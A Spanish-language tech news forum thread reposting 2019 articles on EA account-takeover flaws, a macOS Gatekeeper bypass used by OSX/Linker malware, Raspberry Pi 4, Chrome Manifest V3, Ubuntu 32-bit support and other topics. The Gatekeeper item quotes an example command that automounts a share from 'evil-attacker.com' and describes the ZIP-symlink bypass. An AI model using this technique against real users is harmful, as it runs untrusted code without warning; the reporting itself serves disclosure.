La página web finalmente permitió a los investigadores capturar tokens secretos de SSO de los jugadores con solo convencerlos de que los visitaran en el mismo navegador web en el que ya tienen una sesión activa en el sitio web de EA y tomar sus cuentas sin requerir credenciales reales.

"El mecanismo TRUST existe entre los dominios No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y sus subdominios. Abusar con éxito del mecanismo permitió a nuestro equipo de investigación manipular la implementación del protocolo OAuth para una explotación completa de la adquisición de la cuenta", explicaron los investigadores.


En el peor de los casos, los investigadores de CheckPoint dijeron que un atacante podría haber explotado estas fallas para causar daños potenciales, como obtener acceso a la información de la tarjeta de crédito de los jugadores con la capacidad de comprar de manera fraudulenta la moneda del juego en nombre de los jugadores.

CyberInt y Check Point informaron inmediatamente de sus hallazgos a EA Games y ayudaron a la compañía a solucionar las lagunas de seguridad para proteger a sus clientes de juegos. La firma de seguridad se hizo pública hoy con sus hallazgos, casi tres meses después de que EA abordara los problemas.







Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2812

El nuevo malware de Mac explota el fallo de bypass de GateKeeper que Apple dejó sin parchear

Los investigadores de seguridad cibernética de Intego están advirtiendo sobre la posible explotación activa de una vulnerabilidad de seguridad sin parche en los detalles de las características de seguridad de MacOS Gatekeeper de Apple y el PoC, que se dio a conocer públicamente el mes pasado.

La semana pasada, el equipo de Intego descubrió cuatro muestras de nuevo malware de macOS en VirusTotal que aprovechan la vulnerabilidad de omisión de GateKeeper para ejecutar código no confiable en macOS sin mostrar a los usuarios ninguna advertencia o pedir su permiso explícito.

Sin embargo, el malware recién descubierto, denominado OSX / Linker , no se ha visto en estado salvaje hasta el momento y parece estar en desarrollo. A pesar de que las muestras aprovechan el defecto de desvío de Gatekeeper no parcheado, no descargan ninguna aplicación maliciosa del servidor del atacante.

Según Joshua Long, de Intego, hasta la semana pasada, "el fabricante de malware simplemente estaba realizando un reconocimiento de pruebas de detección".
"Uno de los archivos fue firmado con una ID de desarrollador de Apple (como se explica a continuación), es evidente que las imágenes de disco OSX / Linker son obra de los desarrolladores del adware OSX / Surfbuyer", dijo Long en una publicación de blog.

Sin embargo, dado que la muestra de malware se vincula a un servidor remoto desde donde descarga la aplicación que no es de confianza, los atacantes también pueden distribuir las mismas muestras al objetivo real simplemente reemplazando la aplicación de muestra definida con una aplicación de malware en su servidor.


Vulnerabilidad de omisión del controlador de acceso a macOS
[/size][/color][/b]


GateKeeper es una característica de seguridad integrada en Apple macOS que impone la firma del código y verifica las aplicaciones descargadas antes de permitir que se ejecuten, lo que ayuda a los usuarios a proteger sus sistemas contra malware y otros programas maliciosos.

Eso significa que, si descarga una aplicación de Internet, GateKeeper solo permitirá que se ejecute sin ninguna advertencia si se ha firmado con un certificado válido emitido por Apple, de lo contrario le solicitará que permita o deniegue la ejecución.




Sin embargo, Gatekeeper ha sido diseñado para tratar las unidades externas (USB o HDD) y los recursos compartidos de red como "ubicaciones seguras" desde donde los usuarios pueden ejecutar cualquier aplicación sin involucrar las verificaciones y avisos de GateKeeper.

Filippo Cavallarin, un investigador de seguridad independiente, a fines del mes pasado, reveló públicamente una forma de explotar este comportamiento al combinarlo con otras dos características legítimas del sistema operativo macOS, que son:

Los archivos zip pueden contener enlaces simbólicos que apuntan a una ubicación arbitraria, incluidos los puntos finales de automount, y la función de automount en macOS puede montar automáticamente un recurso compartido de red desde un servidor remoto simplemente accediendo a él con una ruta "especial", es decir, comenzando con "/ net /. "

"Por ejemplo, ls /net/evil-attacker.com/sharedfolder/ hará que el sistema operativo lea el contenido de la 'carpeta compartida' en el host remoto (evil-attacker.com) usando NFS", explicó Cavallarin en una publicación de blog.

Como se muestra en la demostración en video, Cavallarin creó un archivo ZIP con un enlace simbólico a un recurso compartido de red controlado por un atacante que macOS montará automáticamente.

Una vez que la víctima abre el archivo ZIP y sigue el enlace, navegará a la red compartida controlada por el atacante en la que confía el controlador de acceso, engañando a la víctima para que ejecute archivos ejecutables maliciosos sin ninguna advertencia.

"La forma en que está diseñado el Finder (por ejemplo, las extensiones ocultas .app, ocultar la ruta completa de la barra de título) hace que esta técnica sea muy efectiva y difícil de detectar", señala el investigador.

Sin embargo, las muestras de malware recién descubiertas no son archivos ZIP, sino archivos de imagen de disco (con .dmg), lo que muestra que "los fabricantes de malware estaban experimentando para ver si la vulnerabilidad de Cavallarin también funcionaría con las imágenes de disco".

Cavallarin informó responsablemente sus hallazgos a Apple el 22 de febrero, pero decidió hacerlo público a fines del mes pasado luego de que la compañía no pudo solucionar el problema dentro del plazo de 90 días para la divulgación y comenzó a ignorar sus correos electrónicos.

Hasta que Apple solucione este problema, el investigador recomendó a los administradores de red bloquear las comunicaciones de NFS con direcciones IP externas y, para los usuarios domésticos, siempre es importante no abrir archivos adjuntos de correo electrónico de una fuente desconocida, sospechosa o poco confiable.








Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2813
Off Topic / Un error de 400.000 millones de dólares
Junio 25, 2019, 04:06:46 PM
Un error de 400.000 millones de dólares: Bill Gates lamenta que "Microsoft no fuera lo que Android es"




Uno contempla la evolución tecnológica y desde luego se sorprende al comprobar cómo Microsoft perdió batallas tan importantes. La empresa que lo dominaba llegó tarde a la revolución de internet -aunque ha recuperado mucho terreno gracias sobre todo a Azure- y perdió absolutamente la batalla de los smartphones.

Ese es al parecer el mayor pesar de Bill Gates, que en una entrevista reciente explicaba que para él su mayor error fue no convertir a Microsoft en lo que Android es actualmente.

Una revolución que casi nadie supo reconocer a tiempo


Cuando Andy Rubin, Rich Miner, Nick Sears, y Chris White crearon Android en 2003 lo hicieron con una idea curiosa: plantearlo como sistema operativo para cámaras digitales. Poco después cambiaron de rumbo y a finales de 2004 ya estaban transformándolo en un rival de Symbian y Windows Mobile.


El HTC Dream, presentado en 2008, fue el primer móvil basado en Android.


Microsoft no parecía demasiado preocupado por ese segmento, y tampoco lo estaban otras como Nokia o BlackBerry. Mientras, entre bambalinas, se preparaba la revolución. Google hizo un anuncio sorpresa y compró Android, por entonces absolutamente desconocida, por un precio de risa: 50 millones de dólares.

Microsoft no parecía demasiado preocupado por ese segmento, y tampoco lo estaban otras como Nokia o BlackBerry. Mientras, entre bambalinas, se preparaba la revolución. Google hizo un anuncio sorpresa y compró Android, por entonces absolutamente desconocida, por un precio de risa: 50 millones de dólares.

El resto, como suele decirse, es historia. Apple presentó el iPhone en 2007 y Google tardó algo más en sumarse a la revolución: no lanzaría el HTC Dream (o T-Mobile G1) hasta septiembre de 2008. Quienes dominaban el mercado no entendieron lo que se les venía encima y acabaron en la irrelevancia, pero Microsoft sí intentó recomponer sus pasos.

Un error de 400.000 millones de dólares

No lo logró, y sus esfuerzos con Windows Mobile, Windows Phone (con sombras pero también algunas luces) y Windows 10 -compra de Nokia incluida- acabaron fracasando de forma estrepitosa. Hoy en día Microsoft está presente en el mercado gracias a sus servicios y aplicaciones para Android e iOS, pero su papel no es en absoluto protagonista, y eso es algo que parece que le duele especialmente a Bill Gates.




Gates lo confirmaba en un evento para inversores de capital riesgo en el que hacía el siguiente comentario (podéis verlo en el vídeo alrededor del minuto 11:45):

"El mayor error de todos los tiempos fue la que quiera que fuera que resultó ser una mala gestión por mi parte y que provocó que Microsoft no fuera lo que es Android. Es decir, Android es la plataforma telefónica de facto -que no es de Apple-. Era algo natural que Microsoft ganara".


El cocreador de Microsoft iba más allá y cuantificaba aquel error. Para él solo había sitio para un sistema operativo que no fuera el de Apple. "¿Qué valor tiene eso?", se preguntaba a sí mismo. "400.000 millones de dólares que se trasferirían de la empresa G a la empresa M" contestaba a continuación.

Esa estimación del valor de Android en el mercado es llamativa, pero desde luego demuestra lo mucho que perdió Microsoft al no ser lo que Android ha llegado a ser. Curioso, por cierto, que no pronunciase el nombre de Google en esa última frase, algo que provocó las risas de la audiencia. Aquel error, sea como fuere, seguro que no hace reír a nadie en Microsoft.







Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2814
Noticias Informáticas / Raspberry Pi 4 es oficial
Junio 25, 2019, 04:00:21 PM

Raspberry Pi 4 es oficial: una completa actualización con procesador Cortex-A72, hasta 4 GB de RAM y desde 35 dólares

Raspberry Pi es uno de los ordenadores más básicos que podemos encontrar, también uno de los más vendidos de toda la historia informática. Su atractivo precio ha hecho que se vendan millones y millones de unidades generación tras generación. Hoy se ha anunciado, por sorpresa, Raspberry Pi 4. Esta nueva versión con una CPU ARM Cortex-A72 permite, entre otras cosas, la decodificación de vídeo 4K a 60 fps (sin compatibilidad con HDR). Su precio de salida se mantiene fiel al estilo de la marca: 35 dólares para la versión mas básica de todas.





Se esperaba que llegase este nuevo modelo para 2020, sin embargo, la compañía ha conseguido sacar adelante la producción del dispositivo con unos 9-12 meses de antelación, según han explicado. De momento ponen a la venta la Raspberry Pi 4 Model B, el modelo A que tradicionalmente se centra en ofrecer un producto más básico y aún mas barato en esta ocasión aún no lo van a lanzar. Comentan que no han visto cambios significativos por los que ofrecer un dispositivo diferente a menos de 35 dólares, que es lo que cuesta la versión básica de Raspberry Pi 4 Model B.



Raspberry Pi 4 una actualización interna al completo



Raspberry Pi 4 es una actualización mayor de lo que podemos ver a primera vista, el cambio de procesador a un ARM Cortex-172 con cuatro núcleos a 1,5 GHz también implicaba pasar de los 40 nm a los 28 nm. En consecuencia, todos los componentes y la potencia del dispositivo ha cambiado. Explican en el anuncio oficial que los benchmark dan resultados entre dos y cuatro veces mayores respecto a la Raspberry Pi 3B+.





Veamos sus especificaciones técnicas:




Además de mejorar su potencia, un cambio interesante y a tener en cuenta en esta nueva Raspberry Pi 4 es la puesta al día de sus conexiones. Raspberry Pi 4 viene con Bluetooth 5.0 y Wi-Fi 802.11ac para las conexiones inalámbricas. También se ha cambiado el conector microUSB de alimentación por un USB-C que suma 500 mA extra de energía para alcanzar un total de 1.2 A.



Algunos detalles extra a tener en cuenta son por ejemplo el soporte para doble monitor con resolución 4K. La opción para reproducir vídeo 4K a 60 fps en HEVC o los gráficos VideoCore VI, compatibles con OpenGL ES 3.x Por último, hay que tener en cuenta que Raspberry Pi 4 es compatible con todos los productos de Raspberry Pi anteriores.



Accesorios para Raspberry Pi 4


Como siempre, podremos adquirir diferentes accesorios para vitaminar la Raspberry Pi. Dado que Raspberry Pi 4 cambia ligeramente el diseño se han tenido que fabricar accesorios nuevos para ella. Por ejemplo la nueva caja por 5 dólares. Eso sí, advierten que es posible utilizar la de la generación anterior si se corta ligeramente para poder acceder a los conectores.


Caja de la Rapbserry Pi 4 vs. caja antigua y recortada para una Rapsberry Pi 4.

Además de la nueva caja contamos con un nuevo cargador USB-C con enchufe europeo, británico, americano o australiano. ¿Dispones de un enchufe de una Rapsberry Pi anterior? La marca ha puesto a la venta un adaptador de USB micro-B a USB-C por sólo un dolar. También un cable HDMI capaz de llevar un vídeo 4K a 60 fps por 5 dólares.

Para aquellos que les guste trastear, Rapsberry ha actualizado su guía para principiantes al nuevo modelo. Se trata de una guía completa con instrucciones para sacarle partido al miniPC. Y para quien quiera el kit completo hay una versión de la Rapsberry Pi 4 por 120 dólares que incluye el ordenador, la carcasa, teclado, ratón, la guía para principiantes y una microSD de 32 GB.




Precio y disponibilidad de Raspberry Pi 4




Raspberry Pi 4 está disponible para su compra desde distribuidores autorizados de la marca desde hoy mismo. Se han puesto a la venta un total de tres modelos diferentes, que varían según la capacidad de la memoria RAM que traen. Son los siguientes modelos:


- Raspberry Pi 4 con 1 GB de RAM: 35 dólares.

- Raspberry Pi 4 con 2 GB de RAM: 45 dólares.

- Raspberry Pi 4 con 4 GB de RAM: 55 dólares.




Recordemos que la Raspberry Pi 4 que se ha puesto a la venta es el modelo B. Como hemos indicado, la marca no ve cambios significativos como para producir una Raspberry Pi 4 Model A a un menor precio de los 35 dólares de momento. También se está evaluando opciones para crear una Raspberry Pi 4 Model C en el futuro.







Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#2815

Manifest V3 para Google Chrome; mayor seguridad y privacidad para los usuarios y control hacia los desarrolladores


Las extensiones para los navegadores como Firefox y Google Chrome forman una parte muy importante de estos ya que nos permiten añadir todo tipo de funciones y aplicaciones que, por defecto, no están disponibles en el propio navegador. Sin embargo, algunos desarrolladores abusan de estas extensiones para llevar a cabo engaños o espiar a los usuarios y recopilar todo tipo de información de ellos, abusando de su confianza y recopilando datos de navegación o privados.

De forma similar a como ocurre con las aplicaciones de Android, Google utiliza un fichero de manifiesto en el que los desarrolladores deben indicar claramente los permisos que usan las extensiones de manera que quede claro a qué partes de la navegación pueden acceder y a cuáles no. Aunque Google no puede restringir los permisos, al menos los usuarios pueden saber bien a qué partes podrá acceder la extensión y a qué partes no podrá justo antes de instalar la extensión en el navegador.

Con el fin de garantizar la máxima privacidad y seguridad para los usuarios y evitar que algunos desarrolladores abusen de las extensiones, Google va a lanzar el mes que viene para Chrome un nuevo manifiesto obligatorio para las extensiones, Manifest V3. Así es como mejorará nuestra seguridad y privacidad este nuevo control de permisos.


Manifest V3: así mejora la seguridad y privacidad con estos nuevos permisos


Google lanzó ya el primer borrador de Manifest V3 a principios de este año, un borrador que fue muy polémico entre los desarrolladores ya que muchas extensiones quedaban extremadamente limitadas y otras muchas directamente no podían funcionar con normalidad.

Una de las decisiones más polémicas es la que bloquea el bloqueo de APIs de webRequest (utilizado por muchas extensiones para bloquear contenido, como los scripts de rastreo online), obligando a los desarrolladores a usar declarativeNetRequest, limitando enormemente las fuentes de datos de bloqueo a una base de datos única y, además, limitando los filtros a tan solo 30.000. Además, esta nueva función no permite, por ejemplo, bloquear elementos de gran tamaño, inhabilitar la ejecución de código JavaScript en las webs o eliminar las cabeceras de las cookies salientes, entre otras.

Es cierto que Google está ofreciendo a algunos desarrolladores la posibilidad de aumentar artificialmente los límites de estas APIs, sin embargo, a muchos desarrolladores no les gusta depender tanto de Google para poder crear sus extensiones, ya que de un día para otro la compañía puede revocar los permisos y llevar a la desaparición de extensiones tan populares como Tampermonkey (quien no funciona debido a estos nuevos permisos) a causa de Manifest V3.


Cómo probar Chrome con los nuevos permisos de Manifest V3


Por el momento, la mayoría de los usuarios seguirá utilizando Manifest V2 en la rama estable del navegador. Sin embargo, Google ha confirmado que en breve empezará a llevar esta nueva versión a los usuarios del navegador, empezando por la rama Canary del navegador.

Sin ir más lejos, se espera que Google Chrome Canary reciba el nuevo Manifest V3 a principios de julio, dejando varios meses para probarlo, depurarlo y para dar tiempo a los desarrolladores para actualizar sus extensiones. Se espera que a principios de 2020 este nuevo manifiesto llegue como obligatorio a los usuarios de Google Chrome estable.

Para Chromium, el nuevo Manifest V3 va a ser, de momento, opcional. Por ello, los desarrolladores de navegadores basados en Chromium podrán decidir si quieren seguir usando la V2 o dar el salto a la V3. Por desgracia, conociendo a Google como lo conocemos, tarde o temprano esta versión del manifiesto terminará siendo obligatoria para todos.









Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2816

Ubuntu se ha arrepentido y ha tenido que recoger cable, y volverá a dar soporte a los programas de 32 bits. En las últimas horas, la comunidad de Linux había montado en cólera por una decisión que iba a traer muchos problemas y pocas soluciones, como la desaparición de Steam de Ubuntu.


Ubuntu no va a eliminar su versión de 32 bits: buscará una alternativa que no genere problemas

Las alarmas saltaban ayer cuando Steam dijo que iban a dejar de dar soporte a Ubuntu después de que la compañía anunciase que Ubuntu 19.10 iba a dejar de ser compatible con aplicaciones de 32 bits (x86). Esto hacía que sólo pudieran usarse aplicaciones de 64 bits de aquí en adelante, dejando de lado programas como Steam, que sólo están disponibles en su versión ejecutable de 32 bits.

Esto iba a abocar a que Valve recomendase otras distros de Linux para instalar la plataforma y jugar a otros juegos, ya que una gran mayoría de juegos son de 32 bits, mientras que los que requieren más de 4 GB de memoria RAM para jugar utilizan ejecutables 64 bits. Durante un tiempo hubo versiones con dos ejecutables en los juegos nuevos que iban lanzándose, pero en la actualidad esto casi no ocurre debido a los requisitos de los títulos actuales, que normalmente necesitan al menos 8 GB de RAM para funcionar con soltura.

Así, desde hace ya años es muy común encontrar ordenadores con más de 4 GB de RAM, lo que ha hecho que la cuota de mercado para sistemas de 64 bits se haya disparado. Por ejemplo, según la última encuesta de mayo de 2019 de Steam, el 94,55% de los usuarios encuestados usa Windows de 64 bits (10, 8.1. 8 y 7), por el 95,9% del total de los encuestados que usa Windows. Eso nos deja un 1,35% de usuarios de Steam que usa todavía Windows de 32 bits, a pesar de que hay muchas cosas que ya no puedes hacer con un sistema operativo de 32 bits.

Actualmente encontramos que Steam no ha tenido ningún motivo para lanzar el programa como versión de 64 bits (aunque está trabajando en ello en la actualidad), ya que apenas consume unos pocos MB de RAM, y se asegura de que es compatible con ese 1,35% de usuarios que todavía tiene un sistema de 32 bits que usan el PC para jugar a juegos antiguos. A pesar de ello, si estás a la última en juegos, tienes que tener un sistema de 64 bits, ya que además los drivers de NVIDIA ya no están disponibles para sistemas de 32 bits desde hace dos años.




Este es el motivo de que todavía no se haya decidido matar a las aplicaciones de 32 bits, ya que muchas de las que tenemos instaladas en nuestro ordenador quedarían completamente inservibles. Algunas de las más populares, como VLC, Chrome o WinRAR, tienen versiones de 64 bits, y en ocasiones algunos programas incluyen los instaladores de ambas versiones (como el propio Chrome, que los descarga), y ejecutan la correspondiente dependiendo de lo que detecten en el sistema que se instala.

Sin embargo, hay programas como el mencionado Steam, Teamviewer, Speedfan, Evernote, programas para gestionar periféricos (ratones, teclados, impresoras...), o programas antiguos que ya no tienen soporte de sus desarrolladores y no cuentan con una versión equivalente de 64 bits. Para saber si un programa es de 32 o 64 bits no tienes más que ir al administrador de tareas de Windows en tu PC, donde verás que los x86 tienen un «(32 bits)» al final de su nombre. Si lo haces verás que todavía ejecutas muchos de ellos en sus versiones de 32 bits.

En el caso de eliminar las versiones de 32 bits, no tendría sentido tampoco mantener las librerías dobles, por lo que no podríamos ejecutar programas de 32 bits en sistemas operativos de 64 bits. Este es el motivo de que todavía sistemas como Windows 10 tengan su versión de 32 bits, además de que esto lo compatible con dispositivos que tengan pocos gigas de RAM sin disparar el consumo de recursos, como un cajero.


Ubuntu decide recular: mantendrán la versión de 32 bits


Como vemos, crear versiones de 64 bits de programas que no lo necesitan es innecesario, pero también ayuda a no dejar anclados en el pasado a decenas de millones de ordenadores de todo el mundo que no tienen sistemas operativos de 64 bits. No hay diferencia entre usar un programa básico como Steam en una versión de 32 o 64 bits, ya que no se beneficia de las instrucciones o de la cantidad de memoria que permite gestionar.

Por ello, Ubuntu se ha dado cuenta del fallo y ha decidido recular. Los motivos que esgrimían para eliminar el soporte de 32 bits era que los paquetes de esas versiones apenas se descargan ni utilizan, quedando en algunos casos sin actualizar. Al eliminarlos, se aligeran los paquetes y librerías, y hay menos bugs que parchear. De hecho, algunas vulnerabilidades como Spectre y Meltdown no están parcheadas en sistemas operativos de 32 bits.



La compañía llevaba un año preparándose para dejar de dar soporte para la versión i386, y consideraban incluso parar su desarrollo próximamente. Eso no iba a quitar que iban a seguir permitiendo ejecutar aplicaciones de 32 bits en Ubuntu de 64 bits.

Así, próximamente pondrán en disposición de la comunidad un proceso para determinar qué paquetes de 32 bits son necesarios para dar soporte a programas antiguos. De cara al futuro se plantea otro problema al que tendrán que enfrentarse en Ubuntu y también en Windows: cómo eliminar las librerías de 32 bits, pero poder ejecutar a su vez juegos y programas de 32 bits. Desde Ubuntu afirman que con Snaps o LXD es posible tener entornos de 32 bits sin tener que tener las librerías, pero también dificulta mucho el proceso.

A cambio de no incluir las librerías de 32 bits se consiguen sistemas operativos más ligeros, con menor consumo de recursos, menos bugs, desarrollos más sencillos, y entornos más seguros. De momento, todas esas ventajas no justifican dejar a millones de personas en la estacada.










Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2817


Como sabemos, la seguridad es uno de los aspectos más característicos de viajar en avión, y antes de abrochar el cinturón de seguridad hay que enseñar tu pasaporte y tarjeta de embarque en diferentes ocasiones.

Aerolíneas y aeropuertos de todo el mundo buscan actualizar este proceso, utilizando el reconocimiento facial para pasar la puerta de embarque en lugar de tener que enseñar tu documentación.

Delta afirma que se ahorran 9 minutos en el embarque de un vuelo


Es el caso de Delta Air Lines, un aerolínea estadounidense que ya anunciado que los pasajeros que vuelen desde el Aeropuerto Internacional de Mineápolis-Saint Paul tendrán la opción de embarcar utilizando el reconocimiento facial.

Para llevarlo a cabo, esta semana se instalarán los escáners en 16 puertas de embarque, y prometen que estará disponible en todos los vuelos internacionales de la compañía a partir del mes de julio.





Se ahorran dos segundos por cada pasajero






La compañía asegura que, de esta manera, conseguirán ahorrar mucho tiempo en cada embarque. Afirman que con este proceso se tarda dos segundos menos por pasajeros (lo que traduce en nueve minutos en un vuelo de 270 personas).

De todos modos, no es la primera vez que la aerolínea utiliza este sistema, que ya se encuentra operativo en el Aeropuerto Internacional Hartsfield-Jackson de Atlanta. Delta apunta que el 72% de los pasajeros prefieren el nuevo modo de embarque.

En Australia también quieren actualizar todo este proceso, y que los viajeros "sólo" tengan que vaciar sus bolsillos y al pasar por el control de seguridad cada vez que vayan a tomar un vuelo.




Allí también trabajan para que en los próximos cinco años se sustituya el pasaporte por la cara del viajero. Sarah Samuel, directora de IT de Amadeus Asia Pacífico, afirma que con este sistema "si no querías hablar con nadie, puedes evitarlo por completo".

"Ya estamos haciendo pruebas en Europa y Estados Unidos, y espero que antes de que acabe este año hagamos algunas pruebas en Australia y otras partes de Asia, estamos consiguiendo que los pasajeros se registren en sus teléfonos".

Sí, mediante un smartphone con Android o iOS, cada pasajero podrá escanear su pasaporte y asociarlo a su cara. De todos modos, como dice Sarah, todavía hay mucho trabajo para reducir los fallos en este proceso:




Como vemos, un usuario de Twitter asegura que no pudo atravesar las barreras automatizadas de reconocimiento facial en el aeropuerto porque detectaron erróneamente un cráneo que estaba impreso en su camiseta y trataron de encontrar una coincidencia con esa cara.


Además de simplificar el proceso, este sistema seguramente se encontrará con muchos detractores, que quizás no quieran consentir a las compañías y a ciertos gobiernos utilicen un sistema de reconocimiento facial con sus datos.



Jay Stanley, analista político de la Unión Americana de Libertades Civiles, asegura que el Gobierno de los EEUU "está utilizando el extremadamente poderoso y peligroso reconocimiento biométrico de caras, que realmente tiene el potencial de convertirse en una tecnología seria de control".







Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2818


KDE Community ha tenido el placer de anunciar (vía KDE Neon) el lanzamiento de KStars 3.3.1. La nueva versión es la primera actualización de mantenimiento de la serie 3.3 y ha llegado, además de para corregir errores, para añadir nuevas funciones y complementos experimentales. Aunque las nuevas funciones suelen ser llamativas, hay que tener en cuenta la etiqueta de "experimental". Básicamente, estaremos ante funciones que nos presentarán problemas, pero que servirán para ver qué está por venir al famoso planetario de KDE.

Hay dos novedades que solo están disponibles para macOS: se han eliminado los problemas reportados en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta. Por otra parte, el DBus vuelve a funcionar en este lanzamiento, el cual hace que Ekos Scheduler vuelva a estar operativo. El resto de novedades llegarán a todas las plataformas en las que está disponible el planetario, es decir, Linux, macOS y Windows.


KStars 3.3.1 ya disponible para Linux, macOS y Windows


Otras novedades incluidas en esta versión son:


- Nuevo módulo de observatorio.

- Se ha eliminado el flip meridiano.

- Ventana de flujo.

- Restablecer el cuadro de enfoque cuando el montaje gira.

- Ya no aborta el guiado de PHD2 mientras está suspendido.

- Cambio a homebrew, python3 y astroy para la resolución de placas en OS X.

- Ahora comprueba si se detecta la tapa contra el polvo antes de comprobar si la cámara no tiene obturador o está obturada.

- Corregido el problema de traducción con las designaciones de Sol, Luna y Tierra.


Kstars está disponible en los repositorios oficiales de Ubuntu, pero si instalamos esta versión, instalaremos la v3.2.3 del mismo. Si queremos instalar KStars 3.1.1, la mejor opción es instalar su paquete Snap, algo que podremos hacer desde el centro de software de nuestra distribución (si incluye soporte por defecto) o abriendo un terminal y escribiendo el siguiente comando:


1 |  sudo snap install kstars


También podemos instalarlo desde su propio repositorio escribiendo estos comandos:



1 |  sudo apt-add-repository ppa:mutlaqja/ppa


2 |  sudo apt update && sudo apt install indi-full kstars-bleeding





Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2819
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hace un tiempo vi unos vidrios que purificaban aire, pero aun así no me convence la idea de reemplazar bosques por edificios   :(


Saludos!



Concuerdo contigo, nada reemplaza la magnificencia de la naturaleza, el ser humano hasta hoy esta llevando todo a puntos extremos.
#2820
Elon Musk desvela detalles del motor interplanetario con el que quiere llevarnos a Marte: cada vez será más barato y rápido de producir




Raptor es el motor interplanetario de SpaceX pensado para llegar a Marte. Un motor que lleva tiempo diseñándose y que ahora está recibiendo un gran impulso según Elon Musk, CEO de la compañía espacial privada. Tanto que para finales de este año pretenden producir un nuevo motor Raptor cada 12 horas.




Decenas de motores Raptor para impulsar a Starship


Como ya vimos en su momento, Starship es la nave de SpaceX diseñada para llevar al ser humano a Marte. Pero Starship requiere de propulsores y los propulsores requieren de motores. Hasta ahora la empresa había conseguido crear un total de cinco motores Raptor. El primero llegó en enero de 2019 y desde entonces han llegado cuatro más. La idea es que cada vez sea más fácil y barato producirlos.

Pero, ¿cuántos hacen falta? La Starship en sí requiere de 6 motores. Es por ello que la idea es aumentar la producción de motores Raptor de forma exponencial, al menos eso sugirió Elon Musk recientemente en una serie de tweets. Apuntan a producir un motor cada 12 horas para finales de este año.

Starship, la nave de SpaceX que se utilizará para llevar al ser humano a Marte.


Cuantos más Raptor, más baratos de producir

Como suele ocurrir con la producción en serie, se espera que cuanto mayor sea la producción de los motores Raptor menor sea el coste de fabricación. El CEO de la compañía confirmó que actualmente cada uno cuesta más de 2 millones de dólares, pero espera que esta cifra se reduzca hasta diez veces. Haciendo unos cálculos rápidos:

- Cada motor podría costar unos 200.000 dólares de fabricación.

- Cada motor produce unas 200 toneladas de fuerza.

- El coste por tonelada de fuerza equivaldría a unos 1.000 dólares.

- Los motores raptor están diseñados para ser reutilizados 1.000 veces.

- El coste por tonelada de cada vuelo equivaldría a 1 dólar.

Evidentemente son unos cálculos muy generales y sin tener en cuenta otros costes como el mantenimiento o los imprevistos que puedan surgir. Sin embargo nos dan una idea aproximada de lo barato que resultará hacer vuelos interplanetarios dentro de poco, si todo va según el plan previsto por SpaceX.

La reutilización de los cohetes ha sido el foco de SpaceX desde hace tiempo, también su estrategia para crecer económicamente y conseguir sus objetivos. Más allá de las increíbles vistas que generan los aterrizajes en vertical de SpaceX, recuperar y reutilizar los cohetes le permite ahorrar considerablemente recursos.El Starship para Marte también tiene la idea de hacer varios viajes. El motor Raptor utiliza metano y oxígeno líquido como combustible, en teoría se podría crear una instalación en Marte para aprovechar el hielo y dióxido de carbono de Marte para convertirlos en oxígeno y metano con tal de reabastecer al cohete antes de su vuelta a la Tierra.

Primero a la Luna, luego a Marte

Ahora bien, ¿cuándo se van a cumplir todas estas promesas de Elon Musk? Originalmente se esperaba un vuelo no tripulado a Marte para 2022. Pero esta fecha quizás se retrase algo. A cambio, Elon Musk comentó que irán primero a la Luna, ya que está a "sólo tres días y no hace falta sincronización orbital interplanetaria". Recordemos que para 2023 se espera que el multimillonario japonés Yusaku Maezawa haga un viaje alrededor de la Luna en una de las naves de SpaceX.



Volviendo a Starship y los motores Raptor, se espera que haga un vuelo de prueba orbital en 2020, según indicó Elon Musk en enero de este año. El objetivo final es Marte, pero desde luego es una hazaña que llevará un tiempo.







Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta